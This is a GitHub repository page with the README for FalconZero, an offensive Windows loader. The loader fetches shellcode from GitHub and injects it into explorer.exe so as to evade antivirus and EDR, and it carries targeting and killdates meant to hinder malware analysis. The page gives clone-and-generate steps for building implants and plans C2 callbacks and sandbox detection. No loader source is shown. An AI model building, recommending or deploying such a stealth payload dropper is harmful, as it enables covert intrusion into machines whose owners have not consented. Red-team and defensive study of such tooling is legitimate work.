Skip to content
/ FALCONSTRIKE Public

A stealthy, targeted Windows Loader for delivering second-stage payloads(shellcode) to the host machine undetected

slaeryan.github.io/posts/falcon-zero-alpha.html

License

AGPL-3.0 license
5 stars 51 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Wannabe99/FALCONSTRIKE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

62 Commits

bin

bin

 
 

source

source

 
 

test

test

 
 

FALCONSTRIKE.png

FALCONSTRIKE.png

 
 

LICENSE

LICENSE

 
 

README.md

README.md

 
 

demo.gif

demo.gif

 
 

falcon_zero_antiscan.png

falcon_zero_antiscan.png

 
 

generate_implant.py

generate_implant.py

 
 

requirements.txt

requirements.txt

 
 

Repository files navigation

FalconZero

Introducing FalconZero v1.0 - a stealthy, targeted Windows Loader for delivering second-stage payloads(shellcode) to the host machine undetected - first public release version Loader/Dropper of the FALCONSTRIKE project

Features

  • Dynamic shellcode execution
  • Usage of Github as the payload storage area - the payload is fetched from Github
  • Targeted implant Loader - only execute on targeted assets - thwart automated malware analysis and hinder reverse engineering on non-targeted assets
  • Killdates - implant expires after a specific date
  • Stealthy shellcode injection technique without allocating RWX memory pages in victim process to evade AV/EDRs - currently injects to explorer.exe
  • Sensitive strings encrypted using XOR

Demo

GIF demo

Usage

There are many hard things in life but generating an implant shouldn't be one. This is the reason the generate_implant.py script has been created to make your life a breeze. The process is as simple as:

First generate your shellcode as a hex string
Upload it on Github and copy the Github raw URL
For testing(MessageBox shellcode): https://raw.githubusercontent.com/slaeryan/DigitalOceanTest/master/messagebox_shellcode_hex_32.txt
git clone https://github.com/slaeryan/FALCONSTRIKE.git
cd FALCONSTRIKE
pip3 install -r requirements.txt
python3 generate_implant.py

Follow the on-screen instructions and you'll find the output in bin directory if everything goes well.

AV Scan of FalconZero implant

FalconZero v1.0 Antiscan Result

TO-DO

This is an alpha release version and depending on the response many more upgrades to existing functionalities are coming soon.

Some of them are:

  • Integrate various Sandbox detection algorithms
  • Integrate support for more stealthy shellcode injection techniques
  • Integrate function obfuscation to make it stealthier
  • Include a network component to callback to a C2 when a Stage-2 payload is released or to change targets/payloads and configure other options on-the-fly
  • Inject to a remote process from where network activity is not unusual for fetching the shellcode - better OPSEC
  • Include active hours functionality - Loader becomes active during a specified period of day etc.

Feel free to communicate any further feature that you want to see in the next release. Suggestions for improving existing features are also warmly welcome :)

Read more

Author

Upayan (@slaeryan) [slaeryan.github.io]

License

All the code included in this project is licensed under the terms of the GNU AGPLv3 license.

About

A stealthy, targeted Windows Loader for delivering second-stage payloads(shellcode) to the host machine undetected

slaeryan.github.io/posts/falcon-zero-alpha.html

Resources

Readme

License

AGPL-3.0 license
Activity

Stars

5 stars

Watchers

0 watching

Forks

51 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages